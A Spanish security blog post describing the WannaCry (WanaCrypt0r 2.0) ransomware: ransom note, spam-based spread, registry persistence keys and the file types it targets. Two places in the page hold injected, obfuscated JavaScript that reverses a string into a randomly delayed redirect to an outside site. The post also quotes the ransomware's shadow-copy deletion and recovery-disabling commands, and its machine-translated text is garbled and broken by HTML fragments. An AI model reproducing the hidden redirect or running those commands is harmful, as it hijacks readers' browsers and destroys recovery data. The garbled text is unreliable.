CARACTERISTICAS DEL RANSOMWARE WANNADECRYPTOR
Este artículo se crea para ayudar a conocer el ransomware WNCRY (Wana Decrypt0r 2.0) , nueva variante WannaCry y restaurar archivos cifrados con la extensión .WNCRY
Un nuevo ransomware, llamado Wana Decrypt0r 2.0 por los cazadores de malware, ha sido reportado como cifrador de archivos en los ordenadores infectados por él. El virus utiliza la extensión .WNCRY para los archivos cifrados, y se ha informado de una nueva versión de la WannaCry, también conocido como WCry, de dicha familia de ransomwares.
La infección deja caer una nota de rescate, llamada @ Please_Read_Me @ .txt y cambia el fondo de pantalla, así como añade el software con instrucciones para pagar el rescate.
En caso de que haya sido víctima de esta infección ransomware, se recomienda encarecidamente que lea a fondo el siguiente artículo:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tor-virus-malware-sensorstechforum-wallpaper.jpg” width=”664″ height=”280″ /></p>
<p><b>Resumen de amenazas</b></p>
<p><b>Nombre</b><br />
.WNCRY</p>
<p><b>Nueva Descripción breve de mayo 2017 del </b><b>virus ransomware WannaCry</b>.</p>
<p>Cifra los archivos y luego exige a las víctimas pagar una cuota considerable de rescate, con el fin de restaurar los archivos cifrados.</p>
<p><b>Los sín<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tomas
Los archivos se cifran con la extensión de archivo .WNCRY añadida a ellos. Además de esta nota se añade un rescate, @ llamado Please_Read_Me @ .txt. También añade una pantalla de bloqueo, llamado “WanaCrypt0r 2.0”.
Método de distribución:
A través de un paquete de exploits, ataque al archivo DLL, JavaScript malicioso o una descarga dirigida del propio programa malicioso de manera ofuscada.
.Virus WNCRY – ¿Cómo se propaga
Similar a la anterior variante .wcry , este ransomware también puede usar los mismos métodos para propagarse. Están relacionadas con el uso de diferentes tipos de herramientas que se utilizan específicamente para distribuir archivos maliciosos y URLs sin ser detectado:
Software de envío de correo basura (los robots de spam, rastreadores, etc)
Envio a lista de direcciones de correo electrónico de las víctimas potenciales a los que puede enviarse correo spam.
Un malware intermedio puede llevar a cabo la infección.
Un conjunto de servidores y dominios de distribución de mando y control y la descarga de virus de archivo .WNCRY de carga útil.
A pesar de que la WanaCrypt0r 2.0 ransomware puede propagarse a través de sitios web de torrent, actualizaciones falsas u otras configuraciones falsas y ejecutables cargados en hots a la sombra, el método primario de propagación del virus puede ser a través de correos electrónicos creados de manera convincente. Tales correos electrónicos tienen como objetivo llevar a las víctimas a hacer clic en un archivo adjunto a un correo electrónico malintencionado y por lo tanto infectarse con el .Virus WNCRY.
Los archivos adjuntos pueden ser por lo general .js , .exe u otro tipo de archivos ejecutables, pero en algunas situaciones también se relacionan con macros maliciosas.
Estas macros maliciosas pueden ser activadas una vez que el usuario habilita el contenido de un documento. Así es cómo se lleva a cabo este proceso de infección:
Las primeras infecciones de WanaCrypt0r 2.0 han estado en Alemania, Rusia, Taiwán, Pavo, Kazajstán, Indonesia, Vietnam, Japón, España, Ucrania y Filipinas. Sin embargo, el número de países puede subir muy rápidamente poco, ya que este patrón muestra campaña de distribución mundial.
Virus del archivo WNCRY ¿Cómo funciona
Tan pronto como se ejecuta, la infección con este ransomware ya es inevitable, El virus puede situar inmediatamente su carga útil en el ordenador de la víctima. Esta puede estar ubicada en varias carpetas diferentes, Incluido:
%AppData%
%Local%
%LocalLow%
%Itinerancia%
%windows%
La carga útil puede consistir en varios tipos diferentes de archivos. Algunos de esos archivos puede modificar el Registro de Windows y apuntar a las claves Run y RunOnce:
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Run
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion RunOnce
HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion RunOnce
HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Run
En esas llaves, hay cadenas de valor personalizado con datos que pueden ser de entrada, de modo que es posible que el ransomware se ejecute en el inicio del sistema y así comenzar el cifrado de archivos en el arranque.
Además de la actividad de la infección WanaCrypt0r .WNCRY puede eliminar las instantáneas de volumen en el equipo infectado. Esto se hace mediante la ejecución de los siguientes comandos administrativos de Windows:
→ llamado proceso de crear “cmd.exe / c
vssadmin.exe eliminar sombras / todas / quiet
bcdedit.exe / set {defecto} recoveryenabled sin
bcdedit.exe / set {defecto} ignoreallfailures bootstatuspolicy
Además de esta actividad, virus WanaCrypt0r .WNCRY también se reduce un programa, llamado @ @ WanaDecryptor .exe que disponen de un temporizador de tiempo real, con instrucciones avanzadas sobre cómo pagar el rescate. Este programa se llama “WanaCrypt0r 2.0” y es el mensaje tiene el siguiente:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore-files-for-free-sensorstechforum.png” width=”806″ height=”612″ /></p>
<p>Después de que el temporizador en este programa se queda sin tiempo, el cos<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to del rescate puede duplicarse, de acuerdo con los mensajes de scareware y la versión anterior, que también utilizó este software.
Otra de las acciones del programa es que también cambia el fondo de pantalla en el ordenador de la víctima con el siguiente mensaje:
Lamentablemente, sus archivos importantes están codificadas.
Si ves este texto, pero no ven la “Wana Decrypt0r” ventana,
entonces su antivirus eliminado el software de descifrado o eliminado de su ordenador.
Si necesita los archivos que tiene que ejecutar el software de descifrado.
Por favor, encontrar un archivo de aplicación llamado “@ @ WanaDecryptor .exe” en cualquier carpeta o restauración de la cuarentena antivirus.
Ejecutar y siga las instrucciones!
.
WNCRY virus de archivo – Proceso de cifrado
Dos algoritmos de cifrado se pueden utilizar para esta infección específica ransomware. Uno de ellos se conoce como AES (Advanced Encryption Standard) y puede ser utilizado en 128 bits de fuerza. Es uno de los sistemas de cifrado más fuertes y no puede ser descifrado a menos que los criminales cometen un error en el código de cifrado. Se puede generar una clave simétrica, llamada clave FEK después del cifrado. Esta clave puede ser el único método para descifrar los archivos porque con ella el proceso puede invertirse.
Además de esto, otro sistema de cifrado conocido como Ríos-Shamir-Adleman, o RSA también se utiliza en combinación con el sistema de cifrado AES con el fin de generar claves públicas únicas y claves privadas para cada uno de los archivos. Esto hace que el descifrado de cada proceso haya de ser por separado, muy difícil y para un único archivo.
Para el proceso de cifrado, los archivos de virus .WNCRY tienen objetivos que se utilizan ampliamente. Estos archivos son por lo general los de lassiguientes extensiones:
→ “PNG PSD .PspImage .TGA .THM .TIF .TIFF .YUV .AI .EPS .PS .SVG .INDD .PCT .PDF .xlr .XLS .XLSX Accdb .DB DBF MDB .PDB .SQL APK .APP .BAT .CGI .COM .EXE .gadget .JAR .PIF .wsf .DEM .gam .NES .ROM .SAV CAD DWG DXF SIG archivos .kml .GPX .KMZ .ASP .ASPX .CER .CFM .CSR .CSS HTM .HTML .JS .JSP .PHP .RSs .xhtml. DOC DOCX .LOG .MSG .ODT .páginas RTF .tex .TXT .WPD .WPS .CSV .DAT .GED .KEY .keychain .PPS .PPT .PPTX ..INI .PRF archivos codificados .HQX .mim .uue .7z .cbr .DEB .GZ .PKG RAR .RPM .SITX .TAR.GZ .ZIP .zipx BIN CUE .DMG .ISO .MDF dress.Toast .vcd SDF .TAR .TAX2014 .TAX2015 .VCF .XML Audio archivos archivos .AIF .IFF .M3U .M4A .MID .MP3 .mpa WAV WMA vídeo .3G2 .3GP .ASF .AVI FLV MOV MP4 .M4V .MPG .RM SRT .SWF VOB WMV 3D 3DM .3DS .MAX OBJ R.BMP .dds .GIF .JPG ..CRX .plugin .FNT .FON .OTF .TTF .CAB .CPL .CUR .DESKTHEMEPACK .DLL .dmp .DRV .icns ICO LNK .SYS .CFG “Fuente:fileinfo.com
Después de que el cifrado se realiza, el virus .WNCRY puede enviar la clave de descifrado a los ciber-delincuentes para que puedan crear un descifrador de encargo para la víctima, que será enviado de nuevo a él una vez que se pagó el rescate. Pagar el rescate, sin embargo, es altamente desaconsejable.
Los archivos tienen una extensión de archivo .WNCRY añadido a ellos que es único para la infección. Los archivos pueden aparecer con dicha extensión y no se pueden abrir normalmente.
Con el fin de eliminar el ransomware .WNCRY , le instamos a que use la copia de seguridad de sus archivos, primero mediante la creación de copias de ellos y así poder proceder a su restauración.
Si desea eliminar de forma automática y completamente la WanaCrypt0r 2.0, las recomendaciones son centrarse en la eliminación de la infección del ransomware con la ayuda de una herramienta anti-malware avanzado que hará que el proceso de eliminación sea rápida.
Ver información original al respecto en Fuente:
tore-files/
Y, SI USA WINDOWS 10, RECORDAR APLICAR EL PARCHE DE MICROSOFT AL RESPECTO INDICADO EN:
https://blog.satinfo.es/2017/aclarando-conceptos-sobre-el-ataque-masivo-de-esta-manana-con-ransomware-a-servidores-espanoles-el-wannacry/
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.